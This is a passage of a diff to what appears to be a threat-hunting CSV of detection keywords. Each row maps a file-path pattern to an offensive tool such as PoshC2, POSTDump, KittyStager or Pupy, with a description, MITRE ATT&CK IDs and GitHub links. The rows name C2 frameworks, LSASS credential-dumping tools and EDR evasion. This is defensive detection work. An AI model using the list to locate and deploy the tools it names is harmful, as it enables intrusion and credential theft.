TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh.key*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/posh.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*/PoshC2*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/poshc2-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/PoshC2/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-config*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-log*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-project*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-stop-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-update*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/post_exploitation*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/PoshC2*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/poshc2-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/PoshC2/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-config*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-log*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-project*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-stop-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-update*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/post_exploitation*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" "*/POSTDump.git*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*/postLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/postLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/PowerBruteLogon*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*/postLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/postLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/PowerBruteLogon*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" "*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*/powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/powerglot/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/powerloader.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/Powermad.git*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*/powerloader.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Powermad.git*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*/power-pwn.git*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*/PowerSCCM.git*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" -"*/PowerSharpPack.git*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*/powershell/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/PowerSharpPack.git*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*/powershell/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - 